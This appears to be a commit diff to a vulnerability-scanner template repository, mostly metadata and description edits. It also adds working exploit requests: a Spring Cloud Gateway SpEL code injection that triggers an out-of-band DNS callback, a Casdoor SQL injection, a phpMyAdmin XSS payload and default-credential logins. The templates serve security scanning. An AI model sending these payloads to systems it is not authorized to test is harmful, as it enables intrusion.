- "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path
condition: or
- type: word
part: body
words:
- "400 Bad Request" # error in concatenated response
- "500 Internal Server Error"
- "500 Dispatching Error"
condition: or

77
cves/2022/CVE-2022-22947.yaml Normal file
View File

@ -0,0 +1,77 @@
id: CVE-2022-22947
info:
name: Spring Cloud Gateway Code Injection
author: pdteam
severity: critical
description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
reference:
- https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
- https://github.com/wdahlenburg/spring-gateway-demo
- https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
- https://tanzu.vmware.com/security/cve-2022-22947
tags: cve,cve2022,apache,spring,vmware,actuator,oast
requests:
- raw:
- |
POST /actuator/gateway/routes/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/{{randstr}}/**"
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "#{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")}",
"_genkey_1": "/${path}"
}
}
],
"uri": "{{RootURL}}",
"order": 0
}
- |
POST /actuator/gateway/refresh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"predicate": "Paths: [/{{randstr}}], match trailing slash: true",
"route_id": "{{randstr}}",
"filters": [
"[[RewritePath #{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")} = /${path}], order = 1]"
],
"uri": "{{RootURL}}",
"order": 0
}
- |
DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 201
- type: word
part: header
words:
- "/routes/{{randstr}}"
- type: word
part: interactsh_protocol
words:
- "dns"

5
cves/2022/CVE-2022-23131.yaml
View File

@ -4,8 +4,9 @@ info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
severity: critical
description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
reference:
- https://support.zabbix.com/browse/ZBX-20350
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- https://github.com/1mxml/CVE-2022-23131
@ -37,3 +38,5 @@ requests:
- type: dsl
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
# Enhanced by mp on 2022/02/28

2
cves/2022/CVE-2022-23178.yaml
View File

@ -33,3 +33,5 @@ requests:
- '"uname":'
- '"upassword":'
condition: and
# Enhanced by mp on 2022/02/28

10
cves/2022/CVE-2022-23808.yaml
View File

@ -1,26 +1,28 @@
id: CVE-2022-23808
info:
name: phpMyAdmin < 5.1.2 - XSS
name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
author: cckuailong
severity: medium
description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.
description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
reference:
- https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
- https://github.com/dipakpanchal456/CVE-2022-23808
- https://nvd.nist.gov/vuln/detail/CVE-2022-23808
tags: cve,cve2022,phpmyadmin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-23808
cwe-id: CWE-79
tags: cve,cve2022,phpmyadmin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
- "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
@ -36,3 +38,5 @@ requests:
part: body
words:
- "\">'><script>alert(document.domain)</script>"
# Enhanced by mp on 2022/02/28

38
cves/2022/CVE-2022-24124.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2022-24124
info:
name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
author: cckuailong
severity: high
description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
- https://www.exploit-db.com/exploits/50792
- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
metadata:
product: https://casdoor.org/
shodan-query: http.title:"Casdoor"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24124
cwe-id: CWE-89
tags: cve,cve2022,casdoor,sqli,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "XPATH syntax error.*&#39"
- "casdoor"
condition: and
- type: status
status:
- 200

17
cves/2022/CVE-2022-25369.yaml
View File

@ -1,13 +1,22 @@
id: CVE-2022-25369
info:
name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin addition
name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation
author: pdteam
severity: critical
reference: https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0."
reference:
- https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
metadata:
shodan-query: http.component:"Dynamicweb"
tags: cve,cve2022,dynamicweb,rce,unauth
classification:
cve-id: CVE-2022-25369
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-425
requests:
- method: GET
@ -33,4 +42,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by cs on 2022/02/28

12
default-logins/apache/superset-default-login.yaml
View File

@ -1,11 +1,17 @@
id: apache-superset-default-login
id: CVE-2021-44451
info:
name: Apache Superset Default Login
author: dhiyaneshDK
severity: high
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
tags: apache, default-login
classification:
cve-id: CVE-2021-44451
requests:
- raw:
@ -57,3 +63,5 @@ requests:
- type: status
status:
- 302
# Enhanced by mp on 2022/03/02

2
default-logins/apache/tomcat-default-login.yaml
View File

@ -63,4 +63,4 @@ requests:
- type: word
words:
- Apache Tomcat
- Apache Tomcat

102
default-logins/azkaban/azkaban-default-login.yaml
View File

@ -1,47 +1,55 @@
id: azkaban-default-login
info:
name: Azkaban Web Client Default Credential
author: pussycat0x
severity: high
reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- '"session.id"'
- '"success"'
condition: and
- type: word
words:
- 'azkaban.browser.session.id'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- azkaban.browser.session.id
id: azkaban-default-login
info:
name: Azkaban Web Client Default Credential
author: pussycat0x
severity: high
description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
reference:
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
classification:
cwe-id: 255
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- '"session.id"'
- '"success"'
condition: and
- type: word
words:
- 'azkaban.browser.session.id'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- azkaban.browser.session.id
# Enhanced by mp on 2022/03/02
# Enhanced by mp on 2022/03/02

7
default-logins/chinaunicom/chinaunicom-default-login.yaml
View File

@ -1,10 +1,13 @@
id: chinaunicom-default-login
info:
name: Chinaunicom Modem Default Login
name: China Unicom Modem Default Login
author: princechaddha
severity: high
description: Default login credentials were discovered for a China Unicom modem.
tags: chinaunicom,default-login
classification:
cwe-id: 798
requests:
- raw:
@ -31,3 +34,5 @@ requests:
words:
- "/menu.gch"
part: header
# Enhanced by mp on 2022/03/02

6
default-logins/cobbler/cobbler-default-login.yaml
View File

@ -3,11 +3,15 @@ id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
description: Cobbler default login credentials were discovered. When in /etc/cobbler/modules.conf in the [authentication] part of the "testing" module, the credential “testing:testing” is used to authenticate users.
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
- https://github.com/cobbler/cobbler/issues/2909
severity: high
tags: cobbler,default-login,api
classification:
cwe-id: cwe-798
requests:
- raw:
@ -64,3 +68,5 @@ requests:
part: body
regex:
- "(.*[a-zA-Z0-9].+==)</string></value>"
# Enhanced by mp on 2022/03/02

10
default-logins/dell/dell-idrac-default-login.yaml
View File

@ -1,9 +1,15 @@
id: dell-idrac-default-login
info:
name: Dell iDRAC6/7/8 Default login
name: Dell iDRAC6/7/8 Default Login
author: kophjager007
severity: high
description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
reference:
- https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
tags: dell,idrac,default-login
classification:
cwe-id: 798
requests:
- raw:
@ -34,3 +40,5 @@ requests:
- type: word
words:
- '<authResult>0</authResult>'
# Enhanced by mp on 2022/03/02

7
default-logins/dell/dell-idrac9-default-login.yaml
View File

@ -4,7 +4,12 @@ info:
name: DELL iDRAC9 Default Login
author: kophjager007,milo2012
severity: high
description: DELL iDRAC9 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
reference:
- https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
tags: dell,idrac,default-login
classification:
cwe-id: 798
requests:
- raw:
@ -33,3 +38,5 @@ requests:
part: body
words:
- '"authResult":0'
# Enhanced by mp on 2022/03/02

3
default-logins/gitlab/gitlab-weak-login.yaml
View File

@ -11,9 +11,6 @@ info:
metadata:
shodan-query: http.title:"GitLab"
# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
requests:
- raw:
- |

6
default-logins/grafana/grafana-default-login.yaml
View File

@ -35,14 +35,14 @@ requests:
matchers:
- type: word
words:
- "grafana_session" # Login cookie
- "grafana_session" # Login cookie
part: header
- type: word
part: body
words:
- "Logged in" # Logged in keyword
- "Logged in" # Logged in keyword
- type: status
status:
- 200
- 200

2
default-logins/szhe/szhe-default-login.yaml
View File

@ -6,7 +6,7 @@ info:
severity: low
tags: szhe,default-login
reference:
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
requests:
- raw:

7
exposed-panels/barracuda-panel.yaml
View File

@ -5,6 +5,11 @@ info:
author: dhiyaneshDK
severity: info
tags: barracuda,panel,vpn
description: The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any web browser.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
requests:
- method: GET
@ -20,3 +25,5 @@ requests:
- type: word
words:
- 'Barracuda SSL VPN'
# Enhanced by mp on 2022/03/01

7
exposed-panels/bitrix-panel.yaml
View File

@ -5,6 +5,11 @@ info:
author: juicypotato1
severity: info
tags: panel,bitrix,login
description: Bitrix24 is a unified work space that places a complete set of business tools into a single, intuitive interface.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
requests:
- method: GET
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/01

26
exposed-panels/casdoor-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: casdoor-login
info:
name: Casdoor Login Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"Casdoor"
tags: panel,casdoor
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Casdoor</title>"
- type: status
status:
- 200

31
exposed-panels/digitalrebar-login.yaml Normal file
View File

@ -0,0 +1,31 @@
id: digitalrebar-login
info:
name: RackN Digital Rebar Login Panel
author: c-sh0
severity: info
description: RackN Digital Rebar provision UI detection
reference:
- https://docs.rackn.io/
- https://docs.rackn.io/en/latest/doc/server.html#ports
tags: rackn,digitalrebar,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/ui"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Digital Rebar'

27
exposed-panels/directum-login.yaml Normal file
View File

@ -0,0 +1,27 @@
id: directum-login
info:
name: Directum Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="Directum"
tags: directum,panel
requests:
- method: GET
path:
- "{{BaseURL}}/Login.aspx"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DIRECTUM Login"
- "Directum Login"
condition: or
- type: status
status:
- 200

2
exposed-panels/gitlab-detect.yaml
View File

@ -4,6 +4,8 @@ info:
name: Detect Gitlab
author: ehsahil
severity: info
metadata:
shodan-query: http.title:"GitLab"
tags: panel,gitlab
requests:

27
exposed-panels/issabel-login.yaml Normal file
View File

@ -0,0 +1,27 @@
id: issabel-login
info:
name: Issabel Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="Issabel"
tags: issabel,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="http://www.issabel.org"'
- '<title>Issabel - Login page</title>'
condition: or
- type: status
status:
- 200

25
exposed-panels/librenms-login.yaml Normal file
View File

@ -0,0 +1,25 @@
id: librenms-login
info:
name: LibreNMS Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="librenms"
tags: librenms,panel
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>LibreNMS</title>'
- type: status
status:
- 200

27
exposed-panels/ocs-inventory-login.yaml Normal file
View File

@ -0,0 +1,27 @@
id: ocs-inventory-login
info:
name: OCS Inventory Login Panel
author: pikpikcu
severity: info
metadata:
fofa-query: title="OCS Inventory"
tags: ocs-inventory,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>OCS Inventory</title>'
- type: status
status:
- 200

3
exposed-panels/sitefinity-login.yaml
View File

@ -3,6 +3,7 @@ id: sitefinity-login
info:
name: Sitefinity Login
author: dhiyaneshDK
description: This template identifies the Sitefinity login page.
severity: info
reference: https://www.exploit-db.com/ghdb/6722
tags: panel,sitefinity
@ -20,3 +21,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28

32
exposed-panels/subrion-login.yaml Normal file
View File

@ -0,0 +1,32 @@
id: subrion-login
info:
name: Subrion Admin Login Panel
author: princechaddha
severity: info
tags: panel,subrion
requests:
- method: GET
path:
- "{{BaseURL}}/panel"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h1>Welcome to<br>Subrion Admin Panel</h1>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "Subrion CMS ([a-z0-9.]+)</a><br>"

2
exposures/backups/sql-dump.yaml
View File

@ -31,7 +31,7 @@ requests:
headers:
Range: "bytes=0-3000"
max-size: 2000 # Size in bytes - Max Size to read from server response
max-size: 2000 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: regex

4
exposures/backups/zip-backup-files.yaml
View File

@ -40,7 +40,7 @@ requests:
- "sql.z"
- "sql.tar.z"
max-size: 500 # Size in bytes - Max Size to read from server response
max-size: 500 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: binary
@ -66,4 +66,4 @@ requests:
- type: status
status:
- 200
- 200

24
exposures/configs/golang-metrics.yaml
View File

@ -1,24 +0,0 @@
id: exposed-metrics
info:
name: Exposed metrics
author: dhiyaneshDK
severity: low
reference: https://hackerone.com/reports/1026196
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/metrics"
matchers-condition: and
matchers:
- type: word
words:
- 'cpu_seconds_total'
condition: and
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More